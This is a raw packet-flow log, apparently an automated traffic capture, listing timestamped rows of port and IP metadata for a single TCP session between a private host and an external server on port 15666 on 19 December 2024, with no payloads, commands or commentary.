Dec 19, 2024 08:52:47.248610973 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248658895 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248672962 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248776913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248794079 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248796940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248817921 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248872995 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248899937 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248915911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249051094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249145985 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249180079 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249192953 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249207020 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249237061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249237061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249278069 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249291897 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249371052 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249373913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249389887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249433994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249433994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249481916 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249495029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249566078 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249583006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249622107 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249622107 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249650002 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249665976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249716043 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249756098 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249768972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249903917 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249931097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.249955893 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.249995947 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250025034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250037909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250066042 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250067949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250125885 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250159979 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250174046 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250212908 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250214100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250221968 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250257969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250260115 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250272036 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250315905 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250315905 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250387907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250401020 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250416040 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250446081 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250453949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250586987 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250591040 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250631094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250646114 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250690937 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250751972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250766039 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250790119 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250802994 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250842094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250842094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250869989 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250895023 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250941992 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.250969887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.250983000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251060963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251085997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251111984 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251137972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251179934 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251194000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251239061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251262903 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251276970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251332998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251343966 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251370907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251420021 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251457930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251509905 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251523972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251591921 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251610994 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251626968 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251702070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251749992 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251779079 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251813889 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251832962 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.251883030 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251933098 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.251941919 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252264977 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252345085 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252402067 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252414942 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252449036 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252471924 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252501965 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252537966 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252587080 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252608061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252654076 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252693892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252712011 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252743006 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252763033 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252777100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252825022 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252885103 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.252943993 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.252990007 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253038883 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253134012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253181934 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253206015 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253253937 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253348112 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253393888 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253462076 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253515959 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253572941 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253618956 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253685951 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253731966 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253813982 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253860950 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253886938 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253933907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253937960 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.253973007 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.253984928 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254026890 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254036903 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254090071 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254123926 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254175901 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254204035 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254242897 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254252911 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254293919 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254367113 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254412889 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254431009 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254447937 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254482031 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254492044 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254522085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254565001 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254578114 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254611015 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254709959 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254759073 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254846096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254890919 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.254937887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.254991055 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255034924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255084991 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255127907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255182028 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255234003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255281925 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255306959 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255362034 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255409956 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255423069 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255438089 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255464077 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255480051 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255486965 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255563021 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255601883 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255656004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255662918 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255702972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.255853891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.255960941 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256009102 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256069899 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256098032 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256133080 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256146908 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256186008 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256222963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256237030 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256285906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256339073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256344080 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256383896 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256408930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256520033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256544113 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256607056 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256633997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256679058 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256699085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256867886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256921053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.256977081 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.256990910 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257040977 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257045984 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257137060 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257183075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257237911 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257263899 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257308006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257311106 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257339001 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257385969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257450104 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257483006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257518053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257534027 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257565022 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257574081 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257630110 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257695913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257754087 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257833004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257858038 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257911921 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.257939100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.257993937 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258027077 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258115053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258217096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258233070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258291960 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258300066 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258332968 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258385897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258397102 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258444071 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258445978 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258502960 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258574963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258616924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258642912 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258666039 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258701086 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258843899 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258899927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258953094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.258955956 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.258997917 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259006977 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259078979 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259205103 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259233952 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259268045 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259288073 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259299994 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259367943 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259412050 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259471893 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259516954 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259563923 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259604931 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259700060 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259743929 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259813070 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.259859085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259900093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.259919882 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260046005 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260060072 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260098934 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260114908 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260126114 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260193110 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260238886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260266066 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260318041 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260322094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260375023 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260437012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260462046 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260490894 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260513067 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260526896 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260569096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260577917 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260621071 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260628939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260669947 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260705948 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260754108 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260781050 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.260821104 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.260885954 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.261746883 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.261903048 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.261915922 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.261982918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262033939 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262094975 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262115002 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262161016 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262175083 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262213945 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262341976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262355089 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262406111 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262463093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262504101 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262511015 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262532949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262552023 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262619019 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262634039 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262650967 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262682915 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.262805939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262908936 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.262980938 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263022900 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263039112 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263068914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263078928 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263112068 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263120890 CET	49737	15666	192.168.2.4	193.3.19.151
